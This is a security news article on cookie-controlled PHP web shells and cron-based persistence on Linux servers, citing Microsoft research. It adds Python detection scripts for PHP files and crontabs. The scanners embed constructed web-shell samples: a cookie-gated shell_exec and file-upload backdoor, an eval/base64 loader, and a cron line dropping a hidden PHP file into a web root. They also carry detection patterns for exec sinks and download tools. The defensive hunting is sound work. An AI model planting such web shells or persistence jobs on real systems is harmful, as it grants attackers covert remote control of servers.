Cookie-Controlled PHP Web Shells: A Stealthy Threat to Linux Servers
Threat actors are increasingly leveraging HTTP cookies as a control channel for PHP-based web shells on Linux servers, enabling remote code execution with enhanced stealth. This technique allows malicious code to remain dormant until specific cookie values are present, making detection more challenging.

According to findings from the **Microsoft Defender Security Research Team**, threat actors are exploiting HTTP cookies to control **PHP**-based web shells on **Linux** servers. This allows them to achieve remote code execution in a stealthier manner.
"Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution, pass instructions, and activate malicious functionality," **Microsoft** stated.
### The Stealth Advantage
This approach is stealthier because the malicious code stays dormant during normal application execution: the web shell logic runs only when the expected cookie values are present, and that holds however the file is reached, whether through web requests, scheduled tasks, or trusted background workers.
The technique relies on **PHP** doing the work for the attacker: the web server hands the `Cookie` request header to **PHP**, which parses it into the `$_COOKIE` superglobal, so attacker-supplied input is available at runtime without any additional parsing. It also blends into normal web traffic. The default Apache and nginx access-log formats record the request line, referrer and User-Agent but not the `Cookie` header, so the command channel leaves no trace in routine access logs unless logging is deliberately extended (for example with `%{Cookie}i` in an Apache `LogFormat` or `$http_cookie` in nginx, bearing in mind that legitimate session tokens would then land in the logs as well).
### Implementation Variations
The cookie-controlled execution model comes in different implementations:
* A **PHP** loader that uses multiple layers of obfuscation and runtime checks before parsing structured cookie input to execute an encoded secondary payload.
* A **PHP** script that segments structured cookie data to reconstruct operational components such as file handling and decoding functions, and conditionally writes a secondary payload to disk and executes it.
* A **PHP** script that uses a single cookie value as a marker to trigger threat actor-controlled actions, including execution of supplied input and file upload.
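All three variations share one static signature: a cookie source (`$_COOKIE`, `$GLOBALS['_COOKIE']`, the raw `HTTP_COOKIE` header) feeding a decoder and an execution or file-write sink, usually behind an equality or hash check. The Python hunt below is added here as an example; it is not Microsoft's tooling and not code from the observed intrusions. It scores PHP files on that pairing and runs over constructed samples of each shape plus two benign cookie-reading files. The sample PHP, the regexes, the weights and the threshold are assumptions made for illustration.

```python
"""Static hunt for cookie-gated execution in PHP sources.

Added example for this article: not Microsoft's tooling and not code from
the intrusions it describes. Every PHP snippet below is constructed, and
the regexes are heuristics, so a hit is a lead for manual review.
"""
import os
import re

# Where attacker input arrives with no parsing on the attacker's side: the
# $_COOKIE superglobal (also via $GLOBALS['_COOKIE']), $_SERVER['HTTP_COOKIE']
# or getallheaders(). A name built at runtime such as ${"_COO"."KIE"} evades
# this pattern and only registers as obfuscation below.
COOKIE_SOURCE = re.compile(r"_COOKIE\b|HTTP_COOKIE\b|getallheaders\s*\(", re.I)
# Sinks that turn input into code, a shell command, or a file on disk.
EXEC_SINK = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open"
    r"|create_function|call_user_func(?:_array)?"
    r"|file_put_contents|fwrite|move_uploaded_file)\s*\(", re.I)
# Decoders usually wrapped around a cookie-borne payload.
DECODER = re.compile(
    r"\b(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13|hex2bin|strrev)\s*\(",
    re.I)
# An if() that tests a cookie or compares a hash: the activation gate.
COOKIE_GATE = re.compile(
    r"\b(?:else)?if\s*\((?:[^)]*_COOKIE|[^)]*\b(?:md5|sha1|crc32|hash)\s*\()", re.I)
# Cheap obfuscation tells: long base64 runs, variable variables, dynamic names, chr() chains.
OBFUSCATION = re.compile(
    r"[A-Za-z0-9+/=]{60,}|\$\$\w|\$\{\s*['\"]|(?:chr\s*\(\s*\d+\s*\)\s*\.\s*){3,}")
LIKELY_AT = 4  # assumed score at which a file is reported as a probable web shell


def analyze(src: str) -> dict:
    """Score one PHP source string; only the cookie channel is in scope here."""
    has_source = bool(COOKIE_SOURCE.search(src))
    sinks = sorted({m.group(1).lower() for m in EXEC_SINK.finditer(src)})
    decoders = sorted({m.group(1).lower() for m in DECODER.finditer(src)})
    gated = bool(COOKIE_GATE.search(src))
    obfuscated = bool(OBFUSCATION.search(src))
    score = 0
    if has_source and sinks:
        score = 2                        # cookie input and a dangerous sink together
        score += 1 if decoders else 0    # payload is decoded before use
        score += 1 if gated else 0       # execution gated on a cookie or hash check
        score += 1 if obfuscated else 0
        verdict = "likely-webshell" if score >= LIKELY_AT else "review"
    else:
        verdict = "clean"                # no cookie-to-sink pairing in this file
    return {"verdict": verdict, "score": score, "sinks": sinks,
            "decoders": decoders, "gated": gated, "obfuscated": obfuscated}


def scan_tree(root: str, exts=(".php", ".phtml", ".inc")):
    """Walk a web root and yield (path, report) for every file that is not clean."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    report = analyze(fh.read())
            except OSError:
                continue
            if report["verdict"] != "clean":
                yield path, report


# Constructed samples: the marker and loader shapes, plus two benign files.
SAMPLE_MARKER = r"""<?php
if (isset($_COOKIE['sess_id']) && $_COOKIE['sess_id'] === '7c1f0a') {
    if (isset($_COOKIE['cmd'])) { echo shell_exec(base64_decode($_COOKIE['cmd'])); }
    if (isset($_FILES['up'])) { move_uploaded_file($_FILES['up']['tmp_name'], $_FILES['up']['name']); }
}
"""
SAMPLE_LOADER = r"""<?php
$c = $GLOBALS['_COOKIE'];
if (isset($c['__utmz'])) {
    $p = explode('|', $c['__utmz']);
    if (md5($p[0]) === '0f1e2d3c4b5a69788796a5b4c3d2e1f0') { eval(gzinflate(base64_decode($p[1]))); }
}
"""
SAMPLE_PREF = r"""<?php
$theme = isset($_COOKIE['theme']) ? $_COOKIE['theme'] : 'light';
echo '<body class="' . htmlspecialchars($theme) . '">';
"""
SAMPLE_LOG = r"""<?php
if (isset($_COOKIE['consent'])) {
    file_put_contents('/var/log/app/consent.log', date('c') . "\n", FILE_APPEND);
}
"""

if __name__ == "__main__":
    for name, src in (("marker", SAMPLE_MARKER), ("loader", SAMPLE_LOADER),
                      ("pref", SAMPLE_PREF), ("log", SAMPLE_LOG)):
        r = analyze(src)
        print(f"{name:7} {r['verdict']:16} score={r['score']} sinks={r['sinks']}")
```

Run `scan_tree('/var/www')` on a server to list every non-clean file. Expect the consent-logger shape to come back as `review`: the same source-and-sink pairing is legitimate there, which is why the scanner reports its evidence rather than a bare verdict. Superglobal names assembled at runtime and payloads split across several files will be missed, so pair this with the cron and file-creation checks the article recommends.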
### Initial Access and Persistence
In at least one instance, threat actors gained initial access to a victim's hosted **Linux** environment through valid credentials or the exploitation of a known security vulnerability. This access was used to set up a cron job that periodically invokes a shell routine to execute an obfuscated **PHP** loader.

This "self-healing" architecture allows the **PHP** loader to be repeatedly recreated by the scheduled task, even if it is removed during cleanup efforts. This creates a reliable and persistent remote code execution channel. Once deployed, the **PHP** loader remains inactive during normal traffic and only activates upon receiving HTTP requests with specific cookie values.
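The cron-based re-creation described above is what lets the loader survive cleanup, so auditing scheduled tasks is where a hunt should start. The script below is an added example, not Microsoft's tooling: it parses both the system crontab format (with a user field) and the per-user format, and scores each entry for the traits of a re-creation job, namely a high-frequency schedule, inline interpreter code, encoded content, and a redirect or copy into a web directory. The crontab text, the weights and the thresholds are constructed assumptions.

```python
"""Audit cron entries for the self-healing loader pattern.

Added example for this article, not Microsoft's tooling. The crontab text
below is constructed and the scoring is a triage heuristic, not a verdict.
Real inputs live in /etc/crontab and /etc/cron.d/* (system format, with a
user field) and under /var/spool/cron/crontabs/ or /var/spool/cron/ (user
format, no user field).
"""
import re

INLINE_CODE = re.compile(r"\b(?:sh|bash|dash|zsh)\s+-c\b|\bphp\s+-r\b|\bperl\s+-e\b|\bpython[23]?\s+-c\b")
ENCODED = re.compile(r"\bbase64\b|[A-Za-z0-9+/]{40,}={0,2}|\\x[0-9a-f]{2}|\beval\b|gzinflate|str_rot13")
WEB_WRITE = re.compile(r"(?:>>?|\btee\b(?:\s+-a)?|\b(?:cp|mv|install)\b[^|;&>]*)\s*"
                       r"(?:/var/www|/srv/www|/usr/share/nginx|public_html|htdocs|wp-content)")
HIDDEN = re.compile(r"/\.[A-Za-z0-9_]")          # dot-files or dot-directories in the path
TMP_EXEC = re.compile(r"/(?:var/)?tmp/|/dev/shm/")
FETCH = re.compile(r"\b(?:curl|wget)\b")
SILENCED = re.compile(r">\s*/dev/null\s+2>&1|&>\s*/dev/null")


def parse_crontab(text: str, system: bool = True) -> list:
    """Split crontab text into entries. System format carries a user field."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue                     # blank, comment, or environment assignment
        if line.startswith("@"):         # @reboot, @daily, ...: one schedule token
            parts, nsched = line.split(None, 2 if system else 1), 1
        else:
            parts, nsched = line.split(None, 6 if system else 5), 5
        if len(parts) < nsched + (2 if system else 1):
            continue                     # malformed; cron would reject it too
        entries.append({"line": lineno, "schedule": " ".join(parts[:nsched]),
                        "user": parts[nsched] if system else None,
                        "command": parts[-1]})
    return entries


def analyze_entry(entry: dict) -> tuple:
    """Return (score, reasons) for one parsed entry; weights are assumptions."""
    cmd, minute = entry["command"], entry["schedule"].split()[0]
    reasons = []
    if minute == "*":
        reasons.append((2, "runs every minute"))
    elif minute.startswith("*/"):
        reasons.append((1, "runs sub-hourly"))
    for pattern, weight, why in (
            (INLINE_CODE, 2, "inline interpreter code (sh -c, php -r, ...)"),
            (ENCODED, 2, "encoded or eval'd content"),
            (WEB_WRITE, 2, "writes into a web directory"),
            (HIDDEN, 1, "hidden path component"),
            (TMP_EXEC, 1, "runs from a tmp directory"),
            (FETCH, 1, "downloads content"),
            (SILENCED, 1, "output discarded")):
        if pattern.search(cmd):
            reasons.append((weight, why))
    return sum(w for w, _ in reasons), [why for _, why in reasons]


def audit(text: str, system: bool = True) -> list:
    """Parse and score a crontab; 'suspicious' >= 4, 'review' >= 2, else 'ok'."""
    out = []
    for entry in parse_crontab(text, system):
        score, reasons = analyze_entry(entry)
        verdict = "suspicious" if score >= 4 else "review" if score >= 2 else "ok"
        out.append({**entry, "score": score, "reasons": reasons, "verdict": verdict})
    return out


# Constructed /etc/crontab-style input. The base64 run is 30 'A's, a stand-in
# for a loader body; the hidden .cache.php in the web root is the dropped loader.
SAMPLE_CRONTAB = """\
# constructed sample, system format: schedule, user, command
MAILTO=root
0 3 * * * root /usr/bin/certbot renew --quiet
@daily root /usr/sbin/logrotate /etc/logrotate.conf
*/15 * * * * www-data /usr/bin/php /var/www/html/wp-cron.php >/dev/null 2>&1
* * * * * www-data sh -c "echo QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB | base64 -d > /var/www/html/assets/.cache.php"
*/5 * * * * root /bin/sh /var/tmp/.sys/run.sh >/dev/null 2>&1
"""

if __name__ == "__main__":
    for e in audit(SAMPLE_CRONTAB):
        print(f"line {e['line']:2} {e['verdict']:10} score={e['score']} "
              f"user={e['user']} {'; '.join(e['reasons']) or '-'}")
```

Point `audit()` at the contents of `/etc/crontab` and each file in `/etc/cron.d` (system format), and at the per-user files under `/var/spool/cron/crontabs` (Debian) or `/var/spool/cron` (RHEL) with `system=False`. A legitimate `wp-cron.php` entry scores `review` on frequency and silenced output alone, so the next step for anything above `ok` is to read the file the entry invokes; for `suspicious` entries, diff the targeted web directory against a known-good deployment before deleting anything, since the re-creation job and the loader have to be removed together.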
"By shifting execution control into cookies, the web shell can remain hidden in normal traffic, activating only during deliberate interactions," **Microsoft** added. "By separating persistence through cron-based re-creation from execution control through cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in routine application logs."
A common aspect across all implementations is the use of obfuscation to conceal sensitive functionality and cookie-based gating to initiate the malicious action, minimizing the interactive footprint.
### Mitigation Strategies
To counter this threat, **Microsoft** recommends:
* Enforcing multi-factor authentication for hosting control panels, SSH access, and administrative interfaces.
* Monitoring for unusual login activity.
* Restricting the execution of shell interpreters.
* Auditing cron jobs and scheduled tasks across web servers.
* Checking for suspicious file creation in web directories.
* Limiting hosting control panels' shell capabilities.
"The consistent use of cookies as a control mechanism suggests reuse of established web shell tradecraft," **Microsoft** said. "By shifting control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls."
"Rather than relying on complex exploit chains, the threat actor leveraged legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and preserve malicious code."